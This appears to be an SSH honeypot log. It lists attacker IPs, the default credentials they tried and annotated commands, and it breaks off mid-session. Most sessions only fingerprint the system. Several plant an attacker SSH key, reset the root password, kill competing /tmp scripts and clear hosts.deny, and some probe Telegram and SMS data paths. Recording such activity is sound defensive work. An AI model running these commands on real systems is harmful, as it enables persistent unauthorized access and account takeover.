๐ŸŽญ vapor_dragon_root (101.237.36.193) โ€” Yangpu, China ยท 1 session ยท 1 cmd
2026-05-20 14:06 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ wired_liberty_root_2 (167.99.117.2) โ€” Clifton, United States ยท 1 session ยท 19 cmds
2026-05-20 13:14 EDT ยท as root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:K6xDuN1CuFMl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ gnarled_harbor_root (47.76.172.229) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-20 13:08 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ glitchy_sphinx_root (196.202.42.237) โ€” Ash-Shaykh Zฤyid, Egypt ยท 1 session ยท 1 cmd
2026-05-20 12:09 EDT ยท as root/password
hostname discovery
$ hostname
โ†ณ hostname discovery
๐ŸŽญ cryptic_burger_root (103.219.170.37) โ€” Los Angeles, United States ยท 1 session ยท 1 cmd
2026-05-20 11:04 EDT ยท as root/admin
CPU profiling
$ echo "TEST"; echo -n "System :"; lsb_release -d | awk -F':' '{print " "$2}'; echo -n "Apt : "; which apt; echo -n "Cpu speed :"; cat /proc/cpuinfo | grep 'cpu MHz' | uniq | awk -F: '{printf " %.3f\n", $2}'; echo -n "Cpu count : "; nproc; echo -n "Memory : "; free -h | awk '/Mem:/ {print $2}'
โ†ณ CPU profiling
๐ŸŽญ manic_durian_sol (203.121.40.210) โ€” Cheras, Malaysia ยท 1 session ยท 20 cmds
2026-05-20 09:23 EDT ยท as user/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nPlbrlaMc5XMG\nPlbrlaMc5XMG"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nPlbrlaMc5XMG\nPlbrlaMc5XMG\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ cryptic_panda_root (117.72.196.220) โ€” Chaowai, China ยท 1 session ยท 1 cmd
2026-05-20 05:46 EDT ยท as tomcat/tomcat
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m
๐ŸŽญ lurking_wok (39.97.253.71) โ€” Beijing, China ยท 2 sessions ยท 2 cmds
2026-05-07 20:53 EDT ยท as deploy/deploy, guest/guest
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ murky_harbor_root (47.239.88.210) โ€” Hong Kong, Hong Kong ยท 2 sessions ยท 2 cmds
2026-05-17 18:51 EDT ยท as oracle/oracle, root/root
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ grumpy_panda_root_64 (182.43.22.64) โ€” Jinan, China ยท 1 session ยท 1 cmd
2026-05-20 03:30 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ vapor_durian_root (43.163.6.99) โ€” Singapore, Singapore ยท 1 session ยท 19 cmds
2026-05-20 02:51 EDT ยท as root/1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:KAA43816uyFm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ brisk_durian_root (43.163.100.199) โ€” Singapore, Singapore ยท 1 session ยท 19 cmds
2026-05-20 02:45 EDT ยท as root/1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:5mpPlradeL5q"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ savage_windmill_root (34.147.2.169) โ€” Groningen, Netherlands ยท 2 sessions ยท 2 cmds
2026-05-20 02:01 EDT ยท as root/root
privilege check
$ id ร—2
โ†ณ privilege check
๐ŸŽญ haywire_eagle_root_238 (35.196.1.238) โ€” North Charleston, United States ยท 1 session ยท 1 cmd
2026-05-20 02:02 EDT ยท as root/root
privilege check
$ id
โ†ณ privilege check
๐ŸŽญ velvet_eagle_root_79 (35.255.113.79) โ€” Council Bluffs, United States ยท 1 session ยท 1 cmd
2026-05-20 02:00 EDT ยท as root/root
privilege check
$ id
โ†ณ privilege check
๐ŸŽญ silent_silk_root (101.200.52.133) โ€” Beijing, China ยท 2 sessions ยท 2 cmds
2026-05-19 02:59 EDT ยท as mysql/mysql, pi/raspberry
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ midnight_tiger_root_195 (159.65.144.195) โ€” Bengaluru, India ยท 2 sessions ยท 2 cmds
2026-05-18 07:29 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ crimson_panda_root_59 (8.166.131.59) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-05-19 23:13 EDT ยท as root/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ashen_ciao_root (93.62.72.229) โ€” Milan, Italy ยท 1 session ยท 9 cmds
2026-05-19 22:56 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ zealous_shadow_root_111 (83.235.16.111) โ€” Athens, Greece ยท 1 session ยท 2 cmds
2026-05-19 22:10 EDT ยท as oracle/oracle2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_lantern_root_103 (39.96.190.103) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-19 20:44 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ hollow_silk_root_152 (114.55.242.152) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-19 20:05 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rusty_anatolia_root (101.44.36.61) โ€” Istanbul, Turkey ยท 30 sessions ยท 30 cmds
2026-05-19 14:31 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 30x across 30 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—30
๐ŸŽญ venomous_dimsum_root (47.239.240.68) โ€” Hong Kong, Hong Kong ยท 12 sessions ยท 12 cmds
2026-05-19 10:10 EDT ยท as admin/admin, admin/password, deploy/deploy
Ran uname 12x across 12 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—12
๐ŸŽญ wily_liberty_root (100.23.34.160) โ€” Portland, United States ยท 1 session ยท 1 cmd
2026-05-19 13:20 EDT ยท as root/root
history snooping
$ history | tail -5
โ†ณ history snooping
๐ŸŽญ lurking_junk_root (8.218.120.171) โ€” Hong Kong, Hong Kong ยท 38 sessions ยท 38 cmds
2026-05-07 03:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 38x across 38 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—38
๐ŸŽญ molten_liberty_root_113 (43.153.36.113) โ€” Santa Clara, United States ยท 1 session ยท 20 cmds
2026-05-19 12:21 EDT ยท as user/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nE9C3uYG70VU8\nE9C3uYG70VU8"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nE9C3uYG70VU8\nE9C3uYG70VU8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ restless_durian_root_156 (43.163.4.156) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-19 11:09 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ obsidian_silk_root (139.224.164.180) โ€” Shanghai, China ยท 19 sessions ยท 19 cmds
2026-05-19 07:10 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 19x across 19 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—19
๐ŸŽญ sneaky_steppe_root (77.83.72.79) โ€” Moscow, Russia ยท 1 session ยท 1 cmd
2026-05-19 09:08 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wily_peak (8.210.141.114) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-19 07:57 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_pretzel_root (2.27.36.16) โ€” Frankfurt am Main, Germany ยท 1 session ยท 19 cmds
2026-05-19 07:02 EDT ยท as root/root
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:owrNioMwzeok"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ vapor_viking_root (213.67.210.12) โ€” Nรคlden, Sweden ยท 1 session ยท 9 cmds
2026-05-19 06:32 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ ashen_durian_root (104.43.56.65) โ€” Singapore, Singapore ยท 105 sessions ยท 105 cmds
2026-05-15 00:24 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 175x across 175 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—105
๐ŸŽญ rogue_jade_root_39 (101.28.202.39) โ€” Chengde, China ยท 1 session ยท 1 cmd
2026-05-19 05:31 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ silent_cowboy_root (43.173.67.15) โ€” Santa Clara, United States ยท 1 session ยท 19 cmds
2026-05-19 02:24 EDT ยท as root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:3UScRDpwZTtR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ grumpy_frost_root (213.59.140.60) โ€” Vladivostok, Russia ยท 1 session ยท 1 cmd
2026-05-19 01:55 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ derelict_orchid_root (43.160.204.7) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-18 23:05 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ unhinged_panda_root_161 (114.55.170.161) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-18 22:03 EDT ยท as admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ lurking_toque_root (165.245.230.86) โ€” Toronto, Canada ยท 2 sessions ยท 2 cmds
2026-05-07 04:32 EDT ยท as guest/guest, oracle/123456
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ glitchy_baguette_root_40 (130.110.250.40) โ€” Marseille, France ยท 1 session ยท 9 cmds
2026-05-18 20:19 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ stoic_silk_root_141 (8.130.88.141) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-18 17:13 EDT ยท as test/123456
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ placid_merlion_root (43.134.94.132) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-18 17:08 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ crimson_panda_root_225 (39.106.61.225) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-18 15:32 EDT ยท as admin/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wired_dimsum_root_27 (47.239.11.27) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-18 14:54 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ haywire_hockey_root (68.183.204.19) โ€” Toronto, Canada ยท 1 session ยท 1 cmd
2026-05-18 11:38 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_lantern_root_176 (115.190.52.176) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-18 11:27 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ grumpy_shadow_root_60 (186.6.185.60) โ€” Santo Domingo, Dominican Republic ยท 1 session ยท 1 cmd
2026-05-18 11:27 EDT ยท as user/user
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ rabid_orchid_root_148 (47.236.42.148) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-18 11:20 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ haywire_junk_root (54.46.105.56) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-18 10:36 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ midnight_junk_root (165.154.6.75) โ€” Hong Kong, Hong Kong ยท 1 session ยท 19 cmds
2026-05-18 08:53 EDT ยท as root/1234
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
